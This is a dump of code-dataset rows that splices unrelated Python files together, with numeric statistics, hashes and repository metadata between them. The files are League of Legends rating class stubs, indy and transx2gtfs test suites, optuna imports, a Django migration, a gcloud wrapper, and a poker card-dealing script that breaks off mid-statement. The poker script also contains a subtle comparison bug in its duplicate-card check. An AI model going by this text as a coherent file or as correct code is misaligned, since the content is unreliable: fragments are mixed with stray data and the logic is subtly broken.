class NA_Katarina_Jng_Karma(Ratings):
pass
class NA_Katarina_Jng_Karthus(Ratings):
pass
class NA_Katarina_Jng_Kassadin(Ratings):
pass
class NA_Katarina_Jng_Katarina(Ratings):
pass
class NA_Katarina_Jng_Kayle(Ratings):
pass
class NA_Katarina_Jng_Kayn(Ratings):
pass
class NA_Katarina_Jng_Kennen(Ratings):
pass
class NA_Katarina_Jng_Khazix(Ratings):
pass
class NA_Katarina_Jng_Kindred(Ratings):
pass
class NA_Katarina_Jng_Kled(Ratings):
pass
class NA_Katarina_Jng_KogMaw(Ratings):
pass
class NA_Katarina_Jng_Leblanc(Ratings):
pass
class NA_Katarina_Jng_LeeSin(Ratings):
pass
class NA_Katarina_Jng_Leona(Ratings):
pass
class NA_Katarina_Jng_Lissandra(Ratings):
pass
class NA_Katarina_Jng_Lucian(Ratings):
pass
class NA_Katarina_Jng_Lulu(Ratings):
pass
class NA_Katarina_Jng_Lux(Ratings):
pass
class NA_Katarina_Jng_Malphite(Ratings):
pass
class NA_Katarina_Jng_Malzahar(Ratings):
pass
class NA_Katarina_Jng_Maokai(Ratings):
pass
class NA_Katarina_Jng_MasterYi(Ratings):
pass
class NA_Katarina_Jng_MissFortune(Ratings):
pass
class NA_Katarina_Jng_MonkeyKing(Ratings):
pass
class NA_Katarina_Jng_Mordekaiser(Ratings):
pass
class NA_Katarina_Jng_Morgana(Ratings):
pass
class NA_Katarina_Jng_Nami(Ratings):
pass
class NA_Katarina_Jng_Nasus(Ratings):
pass
class NA_Katarina_Jng_Nautilus(Ratings):
pass
class NA_Katarina_Jng_Nidalee(Ratings):
pass
class NA_Katarina_Jng_Nocturne(Ratings):
pass
class NA_Katarina_Jng_Nunu(Ratings):
pass
class NA_Katarina_Jng_Olaf(Ratings):
pass
class NA_Katarina_Jng_Orianna(Ratings):
pass
class NA_Katarina_Jng_Ornn(Ratings):
pass
class NA_Katarina_Jng_Pantheon(Ratings):
pass
class NA_Katarina_Jng_Poppy(Ratings):
pass
class NA_Katarina_Jng_Quinn(Ratings):
pass
class NA_Katarina_Jng_Rakan(Ratings):
pass
class NA_Katarina_Jng_Rammus(Ratings):
pass
class NA_Katarina_Jng_RekSai(Ratings):
pass
class NA_Katarina_Jng_Renekton(Ratings):
pass
class NA_Katarina_Jng_Rengar(Ratings):
pass
class NA_Katarina_Jng_Riven(Ratings):
pass
class NA_Katarina_Jng_Rumble(Ratings):
pass
class NA_Katarina_Jng_Ryze(Ratings):
pass
class NA_Katarina_Jng_Sejuani(Ratings):
pass
class NA_Katarina_Jng_Shaco(Ratings):
pass
class NA_Katarina_Jng_Shen(Ratings):
pass
class NA_Katarina_Jng_Shyvana(Ratings):
pass
class NA_Katarina_Jng_Singed(Ratings):
pass
class NA_Katarina_Jng_Sion(Ratings):
pass
class NA_Katarina_Jng_Sivir(Ratings):
pass
class NA_Katarina_Jng_Skarner(Ratings):
pass
class NA_Katarina_Jng_Sona(Ratings):
pass
class NA_Katarina_Jng_Soraka(Ratings):
pass
class NA_Katarina_Jng_Swain(Ratings):
pass
class NA_Katarina_Jng_Syndra(Ratings):
pass
class NA_Katarina_Jng_TahmKench(Ratings):
pass
class NA_Katarina_Jng_Taliyah(Ratings):
pass
class NA_Katarina_Jng_Talon(Ratings):
pass
class NA_Katarina_Jng_Taric(Ratings):
pass
class NA_Katarina_Jng_Teemo(Ratings):
pass
class NA_Katarina_Jng_Thresh(Ratings):
pass
class NA_Katarina_Jng_Tristana(Ratings):
pass
class NA_Katarina_Jng_Trundle(Ratings):
pass
class NA_Katarina_Jng_Tryndamere(Ratings):
pass
class NA_Katarina_Jng_TwistedFate(Ratings):
pass
class NA_Katarina_Jng_Twitch(Ratings):
pass
class NA_Katarina_Jng_Udyr(Ratings):
pass
class NA_Katarina_Jng_Urgot(Ratings):
pass
class NA_Katarina_Jng_Varus(Ratings):
pass
class NA_Katarina_Jng_Vayne(Ratings):
pass
class NA_Katarina_Jng_Veigar(Ratings):
pass
class NA_Katarina_Jng_Velkoz(Ratings):
pass
class NA_Katarina_Jng_Vi(Ratings):
pass
class NA_Katarina_Jng_Viktor(Ratings):
pass
class NA_Katarina_Jng_Vladimir(Ratings):
pass
class NA_Katarina_Jng_Volibear(Ratings):
pass
class NA_Katarina_Jng_Warwick(Ratings):
pass
class NA_Katarina_Jng_Xayah(Ratings):
pass
class NA_Katarina_Jng_Xerath(Ratings):
pass
class NA_Katarina_Jng_XinZhao(Ratings):
pass
class NA_Katarina_Jng_Yasuo(Ratings):
pass
class NA_Katarina_Jng_Yorick(Ratings):
pass
class NA_Katarina_Jng_Zac(Ratings):
pass
class NA_Katarina_Jng_Zed(Ratings):
pass
class NA_Katarina_Jng_Ziggs(Ratings):
pass
class NA_Katarina_Jng_Zilean(Ratings):
pass
class NA_Katarina_Jng_Zyra(Ratings):
pass
| 16.357314
| 46
| 0.776133
| 972
| 6,821
| 5.020576
| 0.151235
| 0.197951
| 0.42418
| 0.509016
| 0.814139
| 0.814139
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162879
| 6,821
| 416
| 47
| 16.396635
| 0.854641
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
83e5562155ab53efab62c578a3de9b14c019bb85
| 477
|
py
|
Python
|
wrappers/python/tests/did/test_set_did_metadata.py
|
sklump/indy-sdk
|
ee05a89ddf60b42f7483bebf2d89a936e12730df
|
[
"Apache-2.0"
] | 636
|
2017-05-25T07:45:43.000Z
|
2022-03-23T22:30:34.000Z
|
wrappers/python/tests/did/test_set_did_metadata.py
|
Nick-1979/indy-sdk
|
e5f812e14962f0d51cf96f843033754ff841ce30
|
[
"Apache-2.0"
] | 731
|
2017-05-29T07:15:08.000Z
|
2022-03-31T07:55:58.000Z
|
wrappers/python/tests/did/test_set_did_metadata.py
|
Nick-1979/indy-sdk
|
e5f812e14962f0d51cf96f843033754ff841ce30
|
[
"Apache-2.0"
] | 904
|
2017-05-25T07:45:49.000Z
|
2022-03-31T07:43:31.000Z
|
import pytest
from indy import did
@pytest.mark.asyncio
async def test_set_did_metadata_works(wallet_handle, metadata):
(_did, _) = await did.create_and_store_my_did(wallet_handle, "{}")
await did.set_did_metadata(wallet_handle, _did, metadata)
@pytest.mark.asyncio
async def test_set_did_metadata_works_for_empty_string(wallet_handle):
(_did, _) = await did.create_and_store_my_did(wallet_handle, "{}")
await did.set_did_metadata(wallet_handle, _did, '')
| 29.8125
| 70
| 0.779874
| 71
| 477
| 4.746479
| 0.323944
| 0.21365
| 0.166172
| 0.130564
| 0.753709
| 0.753709
| 0.753709
| 0.753709
| 0.753709
| 0.753709
| 0
| 0
| 0.1174
| 477
| 15
| 71
| 31.8
| 0.800475
| 0
| 0
| 0.4
| 0
| 0
| 0.008386
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83ef585b18e8c1bd48b1a24a50ed08061826bd7b
| 278
|
py
|
Python
|
optuna_core/trial/__init__.py
|
hvy/optuna-core
|
be9df49424aa4022cfcec7d9423768cc39c73ae6
|
[
"MIT"
] | 1
|
2020-10-09T02:35:25.000Z
|
2020-10-09T02:35:25.000Z
|
optuna_core/trial/__init__.py
|
hvy/optuna-core
|
be9df49424aa4022cfcec7d9423768cc39c73ae6
|
[
"MIT"
] | null | null | null |
optuna_core/trial/__init__.py
|
hvy/optuna-core
|
be9df49424aa4022cfcec7d9423768cc39c73ae6
|
[
"MIT"
] | null | null | null |
from optuna_core.trial._base import BaseTrial # NOQA
from optuna_core.trial._frozen import create_trial # NOQA
from optuna_core.trial._frozen import FrozenTrial # NOQA
from optuna_core.trial._state import TrialState # NOQA
from optuna_core.trial._trial import Trial # NOQA
| 46.333333
| 58
| 0.820144
| 41
| 278
| 5.292683
| 0.317073
| 0.230415
| 0.322581
| 0.437788
| 0.534562
| 0.322581
| 0.322581
| 0
| 0
| 0
| 0
| 0
| 0.125899
| 278
| 5
| 59
| 55.6
| 0.893004
| 0.086331
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f7c08425bcf40b7e6ab4bb7ffe5fae3db2db9471
| 6,484
|
py
|
Python
|
transx2gtfs/tests/test_calendar.py
|
aclong/transx2gtfs
|
36d5b87d425c5dd299a3fbc7e973aff91876c2ca
|
[
"MIT"
] | 5
|
2020-02-10T19:51:12.000Z
|
2021-03-06T23:52:50.000Z
|
transx2gtfs/tests/test_calendar.py
|
aclong/transx2gtfs
|
36d5b87d425c5dd299a3fbc7e973aff91876c2ca
|
[
"MIT"
] | 23
|
2020-01-24T13:09:56.000Z
|
2021-10-05T13:45:50.000Z
|
transx2gtfs/tests/test_calendar.py
|
aclong/transx2gtfs
|
36d5b87d425c5dd299a3fbc7e973aff91876c2ca
|
[
"MIT"
] | 6
|
2020-01-28T20:46:46.000Z
|
2021-10-13T14:32:04.000Z
|
from transx2gtfs.data import get_path
import pytest
@pytest.fixture
def test_tfl_data():
return get_path('test_tfl_format')
@pytest.fixture
def test_txc21_data():
return get_path('test_txc21_format')
@pytest.fixture
def test_naptan_data():
return get_path('naptan_stops')
def test_calendar_weekday_info_tfl(test_tfl_data):
from transx2gtfs.calendar import get_service_operative_days_info
import untangle
data = untangle.parse(test_tfl_data)
operative_days = get_service_operative_days_info(data)
# Should return text
assert isinstance(operative_days, str)
# Should contain text 'Weekend'
assert operative_days == 'Weekend'
def test_calendar_weekday_info_txc21(test_txc21_data):
from transx2gtfs.calendar import get_service_operative_days_info
import untangle
data = untangle.parse(test_txc21_data)
operative_days = get_service_operative_days_info(data)
# Should return text
assert isinstance(operative_days, str)
# Should contain text 'Weekend'
assert operative_days == 'Weekend'
def test_calendar_dataframe_tfl(test_tfl_data):
from transx2gtfs.calendar import get_weekday_info, parse_day_range
from pandas import DataFrame
from pandas.testing import assert_frame_equal
import untangle
data = untangle.parse(test_tfl_data)
# Get vehicle journeys
vjourneys = data.TransXChange.VehicleJourneys.VehicleJourney
correct_frames = {'Sunday': DataFrame({'friday': 0.0, 'monday': 0.0, 'saturday': 0.0,
'sunday': 1.0, 'thursday': 0.0,
'tuesday': 0.0, 'wednesday': 0.0}, index=[0]),
'Saturday': DataFrame({'friday': 0.0, 'monday': 0.0, 'saturday': 1.0,
'sunday': 0.0, 'thursday': 0.0,
'tuesday': 0.0, 'wednesday': 0.0}, index=[0])
}
for i, journey in enumerate(vjourneys):
# Parse weekday operation times from VehicleJourney
weekdays = get_weekday_info(journey)
# Should return text
assert isinstance(weekdays, str)
# Should be either 'Sunday' or 'Saturday'
assert weekdays in ['Sunday', 'Saturday']
# Get a row of DataFrame
calendar_info = parse_day_range(weekdays)
assert_frame_equal(calendar_info, correct_frames[weekdays])
def test_calendar_dataframe_txc21(test_txc21_data):
from transx2gtfs.calendar import get_weekday_info, parse_day_range
from pandas import DataFrame
from pandas.testing import assert_frame_equal
import untangle
data = untangle.parse(test_txc21_data)
# Get vehicle journeys
vjourneys = data.TransXChange.VehicleJourneys.VehicleJourney
correct_frames = {'Sunday': DataFrame({'friday': 0.0, 'monday': 0.0, 'saturday': 0.0,
'sunday': 1.0, 'thursday': 0.0,
'tuesday': 0.0, 'wednesday': 0.0}, index=[0]),
'Saturday': DataFrame({'friday': 0.0, 'monday': 0.0, 'saturday': 1.0,
'sunday': 0.0, 'thursday': 0.0,
'tuesday': 0.0, 'wednesday': 0.0}, index=[0])
}
for i, journey in enumerate(vjourneys):
# Parse weekday operation times from VehicleJourney
weekdays = get_weekday_info(journey)
# Should return text
assert isinstance(weekdays, str)
# Should be either 'Sunday' or 'Saturday'
assert weekdays in ['Sunday', 'Saturday']
# Get a row of DataFrame
calendar_info = parse_day_range(weekdays)
assert_frame_equal(calendar_info, correct_frames[weekdays])
def test_get_calendar_tfl(test_tfl_data):
from transx2gtfs.calendar import get_calendar
from transx2gtfs.transxchange import get_gtfs_info
from pandas import DataFrame
from pandas.testing import assert_frame_equal
import numpy as np
import untangle
data = untangle.parse(test_tfl_data)
# Get gtfs info
gtfs_info = get_gtfs_info(data)
assert isinstance(gtfs_info, DataFrame)
# Get GTFS calendar
gtfs_calendar = get_calendar(gtfs_info)
assert isinstance(gtfs_calendar, DataFrame)
correct_frame = DataFrame({
'service_id': ["1-HAM-_-y05-2675925_20190713_20190714_Sunday",
"1-HAM-_-y05-2675925_20190713_20190714_Saturday"],
'monday': np.int64([0, 0]), 'tuesday': np.int64([0, 0]), 'wednesday': np.int64([0, 0]),
'thursday': np.int64([0, 0]), 'friday': np.int64([0, 0]),
'saturday': np.int64([0, 1]), 'sunday': np.int64([1, 0]),
'start_date': ["20190713", "20190713"],
'end_date': ["20190714", "20190714"],
}, index=[0, 1])
try:
# Check that the frames match
assert_frame_equal(gtfs_calendar, correct_frame)
except AssertionError as e:
# Ignore the dtype int32/int64 difference
if """Attribute "dtype" are different""" in str(e):
pass
else:
raise e
def test_get_calendar_txc21(test_txc21_data):
from transx2gtfs.calendar import get_calendar
from transx2gtfs.transxchange import get_gtfs_info
from pandas import DataFrame
from pandas.testing import assert_frame_equal
import numpy as np
import untangle
data = untangle.parse(test_txc21_data)
# Get gtfs info
gtfs_info = get_gtfs_info(data)
assert isinstance(gtfs_info, DataFrame)
# Get GTFS calendar
gtfs_calendar = get_calendar(gtfs_info)
assert isinstance(gtfs_calendar, DataFrame)
correct_frame = DataFrame({
'service_id': ["99-PIC-B-y05-4_20200201_20200202_Sunday",
"99-PIC-B-y05-4_20200201_20200202_Saturday"],
'monday': np.int64([0, 0]), 'tuesday': np.int64([0, 0]), 'wednesday': np.int64([0, 0]),
'thursday': np.int64([0, 0]), 'friday': np.int64([0, 0]),
'saturday': np.int64([0, 1]), 'sunday': np.int64([1, 0]),
'start_date': ["20200201", "20200201"],
'end_date': ["20200202", "20200202"],
}, index=[0, 1])
try:
# Check that the frames match
assert_frame_equal(gtfs_calendar, correct_frame)
except AssertionError as e:
# Ignore the dtype int32/int64 difference
if """Attribute "dtype" are different""" in str(e):
pass
else:
raise e
| 33.081633
| 95
| 0.637724
| 791
| 6,484
| 5.013906
| 0.1378
| 0.017146
| 0.024206
| 0.022693
| 0.934695
| 0.901664
| 0.886536
| 0.873424
| 0.871407
| 0.849218
| 0
| 0.065754
| 0.256477
| 6,484
| 195
| 96
| 33.251282
| 0.756897
| 0.092998
| 0
| 0.801653
| 0
| 0
| 0.130761
| 0.02902
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.07438
| false
| 0.016529
| 0.214876
| 0.024793
| 0.31405
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f7e4e6dc5d2090fe3d9bf6fc59fa418373f48a37
| 2,848
|
py
|
Python
|
TWLight/resources/migrations/0025_auto_20170113_1614.py
|
saloniig/TWLight
|
cd92e690b79676299d95394abf9e66885eac9d73
|
[
"MIT"
] | 2
|
2020-01-17T09:14:55.000Z
|
2020-01-17T09:15:20.000Z
|
TWLight/resources/migrations/0025_auto_20170113_1614.py
|
saloniig/TWLight
|
cd92e690b79676299d95394abf9e66885eac9d73
|
[
"MIT"
] | 11
|
2022-03-18T18:05:40.000Z
|
2022-03-18T18:06:04.000Z
|
TWLight/resources/migrations/0025_auto_20170113_1614.py
|
saloniig/TWLight
|
cd92e690b79676299d95394abf9e66885eac9d73
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("resources", "0024_auto_20170113_1606")]
operations = [
migrations.AlterField(
model_name="partner",
name="description",
field=models.TextField(
help_text="Optional description of this partner's offerings. You can enter HTML and it should render properly - if it does not, the developer forgot a | safe filter in the template. Whatever you enter here will also be automatically copied over to the description field for *your current language*, so you do not need to also fill that out.",
null=True,
blank=True,
),
),
migrations.AlterField(
model_name="partner",
name="description_en",
field=models.TextField(
help_text="Optional description of this partner's offerings. You can enter HTML and it should render properly - if it does not, the developer forgot a | safe filter in the template. Whatever you enter here will also be automatically copied over to the description field for *your current language*, so you do not need to also fill that out.",
null=True,
blank=True,
),
),
migrations.AlterField(
model_name="partner",
name="description_fi",
field=models.TextField(
help_text="Optional description of this partner's offerings. You can enter HTML and it should render properly - if it does not, the developer forgot a | safe filter in the template. Whatever you enter here will also be automatically copied over to the description field for *your current language*, so you do not need to also fill that out.",
null=True,
blank=True,
),
),
migrations.AlterField(
model_name="partner",
name="description_fr",
field=models.TextField(
help_text="Optional description of this partner's offerings. You can enter HTML and it should render properly - if it does not, the developer forgot a | safe filter in the template. Whatever you enter here will also be automatically copied over to the description field for *your current language*, so you do not need to also fill that out.",
null=True,
blank=True,
),
),
migrations.AlterField(
model_name="partner",
name="languages",
field=models.ManyToManyField(
help_text="Select all languages in which this partner publishes content.",
to="resources.Language",
null=True,
blank=True,
),
),
]
| 48.271186
| 358
| 0.61552
| 343
| 2,848
| 5.06414
| 0.244898
| 0.057571
| 0.071963
| 0.083477
| 0.847438
| 0.847438
| 0.847438
| 0.818077
| 0.818077
| 0.818077
| 0
| 0.008709
| 0.314607
| 2,848
| 58
| 359
| 49.103448
| 0.881148
| 0.007374
| 0
| 0.745098
| 0
| 0.078431
| 0.539469
| 0.008142
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019608
| 0
| 0.078431
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
793b887aec53d0115275fdbf3764951d56247bd8
| 417
|
py
|
Python
|
library/gcloud_accessor/rest_library/gcloud_rest_library.py
|
anchitarnav/gcloud-resource-cleanup
|
a3b220f406529df43ffd5afa8adb929c718caba5
|
[
"MIT"
] | null | null | null |
library/gcloud_accessor/rest_library/gcloud_rest_library.py
|
anchitarnav/gcloud-resource-cleanup
|
a3b220f406529df43ffd5afa8adb929c718caba5
|
[
"MIT"
] | 6
|
2020-04-29T09:09:48.000Z
|
2021-04-30T21:13:57.000Z
|
library/gcloud_accessor/rest_library/gcloud_rest_library.py
|
anchitarnav/gcloud-resource-cleanup
|
a3b220f406529df43ffd5afa8adb929c718caba5
|
[
"MIT"
] | null | null | null |
from library.gcloud_accessor.rest_library.services.compute import GcloudCompute
from library.gcloud_accessor.rest_library.services.sqladmin import GcloudSqlAdmin
from library.gcloud_accessor.rest_library.services.redis import GcloudRedisV1
from library.gcloud_accessor.rest_library.services.storage import GcloudStorageV1
class GcloudRestLib(GcloudCompute, GcloudSqlAdmin, GcloudRedisV1, GcloudStorageV1):
pass
| 46.333333
| 83
| 0.880096
| 47
| 417
| 7.638298
| 0.382979
| 0.122563
| 0.189415
| 0.278552
| 0.490251
| 0.490251
| 0.490251
| 0
| 0
| 0
| 0
| 0.010283
| 0.067146
| 417
| 8
| 84
| 52.125
| 0.912596
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.166667
| 0.666667
| 0
| 0.833333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
f70d3e28da9aa68e8d861ebac687968a147701ef
| 284,723
|
py
|
Python
|
poker.py
|
TheArnabDey/PokerDataStyle
|
8eeffced3c337e76219b7c1ce1d43a5f4cfeea1b
|
[
"Apache-2.0"
] | null | null | null |
poker.py
|
TheArnabDey/PokerDataStyle
|
8eeffced3c337e76219b7c1ce1d43a5f4cfeea1b
|
[
"Apache-2.0"
] | null | null | null |
poker.py
|
TheArnabDey/PokerDataStyle
|
8eeffced3c337e76219b7c1ce1d43a5f4cfeea1b
|
[
"Apache-2.0"
] | null | null | null |
import random
import pandas as pd
import numpy as np
df1 = pd.read_csv('train.csv')
df2 = pd.read_csv('train.csv')
df3 = pd.read_csv('train.csv')
df4 = pd.read_csv('train.csv')
df5 = pd.read_csv('train.csv')
for i in range(0,1000000):
for k in range (1,5):
x = 0
# Create Pre-Flop round
if k == 1:
df1.loc[i * 4 + k-1] = -1
df2.loc[i * 4 + k-1] = -1
df3.loc[i * 4 + k - 1] = -1
df4.loc[i * 4 + k - 1] = -1
df5.loc[i * 4 + k - 1] = -1
# Generate first card for P1
df1.iloc[i * 4 + k-1, 0] = random.randrange(1,5)
df1.iloc[i * 4 + k-1, 1] = random.randrange(2,15)
while x == 0:
print "Step 1"
# Generate 2nd card for P1
df1.iloc[i * 4 + k-1, 2] = random.randrange(1,5)
df1.iloc[i * 4 + k-1, 3] = random.randrange(2,15)
#Check if this card is already generated in this game, then re-generate
if (df1.iloc[i * 4 + k-1, 2] == df1.iloc[i * 4 + k-1, 0] and df1.iloc[i * 4 + k-1, 3] == df1.iloc[i * 4 + k-1, 1]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 2"
# Generate 2nd card for P2
df2.iloc[i * 4 + k - 1, 2] = random.randrange(1, 5)
df2.iloc[i * 4 + k - 1, 3] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df2.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 0] and df2.iloc[i * 4 + k - 1, 3] ==
df1.iloc[i * 4 + k - 1, 1])\
or (df2.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 2] and df2.iloc[i * 4 + k - 1, 3] == \
df1.iloc[i * 4 + k - 1, 3]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 3"
# Generate 2nd card for P3
df3.iloc[i * 4 + k - 1, 2] = random.randrange(1, 5)
df3.iloc[i * 4 + k - 1, 3] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df3.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 0] and df3.iloc[i * 4 + k - 1, 3] ==
df1.iloc[i * 4 + k - 1, 1])\
or (df3.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 2] and df3.iloc[i * 4 + k - 1, 3] ==
df1.iloc[i * 4 + k - 1, 3])\
or (df3.iloc[i * 4 + k - 1, 2] == df2.iloc[i * 4 + k - 1, 2] and df3.iloc[i * 4 + k - 1, 3] ==
df2.iloc[i * 4 + k - 1, 3]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 4"
# Generate 2nd card for P4
df4.iloc[i * 4 + k - 1, 2] = random.randrange(1, 5)
df4.iloc[i * 4 + k - 1, 3] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df4.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 0] and df4.iloc[i * 4 + k - 1, 3] ==
df1.iloc[i * 4 + k - 1, 1])\
or (df4.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 3] ==
df1.iloc[i * 4 + k - 1, 3])\
or (df4.iloc[i * 4 + k - 1, 2] == df2.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 3] ==
df2.iloc[i * 4 + k - 1, 2])\
or (df4.iloc[i * 4 + k - 1, 2] == df3.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 3] ==
df3.iloc[i * 4 + k - 1, 3]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 5"
# Generate 2nd card for P5
df5.iloc[i * 4 + k - 1, 2] = random.randrange(1, 5)
df5.iloc[i * 4 + k - 1, 3] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df5.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 0] and df5.iloc[i * 4 + k - 1, 3] ==
df1.iloc[i * 4 + k - 1, 1])\
or (df5.iloc[i * 4 + k - 1, 2] == df1.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 3] ==
df1.iloc[i * 4 + k - 1, 3])\
or (df5.iloc[i * 4 + k - 1, 2] == df2.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 3] ==
df2.iloc[i * 4 + k - 1, 3])\
or (df5.iloc[i * 4 + k - 1, 2] == df3.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 3] ==
df3.iloc[i * 4 + k - 1, 3])\
or (df5.iloc[i * 4 + k - 1, 2] == df4.iloc[i * 4 + k - 1, 2] and df5.iloc[i * 4 + k - 1, 3] ==
df4.iloc[i * 4 + k - 1, 3]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 6"
# Generate 1st card for P2
df2.iloc[i * 4 + k - 1, 0] = random.randrange(1, 5)
df2.iloc[i * 4 + k - 1, 1] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df2.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 0] and df2.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 1]) \
or (df2.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 2] and df2.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 3]) \
or (df2.iloc[i * 4 + k - 1, 0] == df2.iloc[i * 4 + k - 1, 2] and df2.iloc[i * 4 + k - 1, 1] ==
df2.iloc[i * 4 + k - 1, 3]) \
or (df2.iloc[i * 4 + k - 1, 0] == df3.iloc[i * 4 + k - 1, 2] and df2.iloc[i * 4 + k - 1, 1] ==
df3.iloc[i * 4 + k - 1, 3]) \
or (df2.iloc[i * 4 + k - 1, 0] == df4.iloc[i * 4 + k - 1, 2] and df2.iloc[i * 4 + k - 1, 1] ==
df4.iloc[i * 4 + k - 1, 3]) \
or (df2.iloc[i * 4 + k - 1, 0] == df5.iloc[i * 4 + k - 1, 2] and df2.iloc[i * 4 + k - 1, 1] ==
df5.iloc[i * 4 + k - 1, 3]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 7"
# Generate 1st card for P3
df3.iloc[i * 4 + k - 1, 0] = random.randrange(1, 5)
df3.iloc[i * 4 + k - 1, 1] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df3.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 0] and df3.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 1]) \
or (df3.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 2] and df3.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 3]) \
or (df3.iloc[i * 4 + k - 1, 0] == df2.iloc[i * 4 + k - 1, 2] and df3.iloc[i * 4 + k - 1, 1] ==
df2.iloc[i * 4 + k - 1, 3]) \
or (df3.iloc[i * 4 + k - 1, 0] == df3.iloc[i * 4 + k - 1, 2] and df3.iloc[i * 4 + k - 1, 1] ==
df3.iloc[i * 4 + k - 1, 3]) \
or (df3.iloc[i * 4 + k - 1, 0] == df4.iloc[i * 4 + k - 1, 2] and df3.iloc[i * 4 + k - 1, 1] ==
df4.iloc[i * 4 + k - 1, 3]) \
or (df3.iloc[i * 4 + k - 1, 0] == df5.iloc[i * 4 + k - 1, 2] and df3.iloc[i * 4 + k - 1, 1] ==
df5.iloc[i * 4 + k - 1, 3])\
or (df3.iloc[i * 4 + k - 1, 0] == df2.iloc[i * 4 + k - 1, 0] and df3.iloc[i * 4 + k - 1, 1] ==
df2.iloc[i * 4 + k - 1, 1]):
continue
else:
x = 1
x = 0
while x == 0:
print "Step 8"
# Generate 1st card for P4
df4.iloc[i * 4 + k - 1, 0] = random.randrange(1, 5)
df4.iloc[i * 4 + k - 1, 1] = random.randrange(2, 15)
# Check if this card is already generated in this game, then re-generate
if (df4.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 0] and df4.iloc[i * 4 + k - 1, 1] ==
df1.iloc[i * 4 + k - 1, 1]) \
or (df4.iloc[i * 4 + k - 1, 0] == df1.iloc[i * 4 + k - 1, 2] and df4.iloc[i * 4 + k - 1, 1] ==
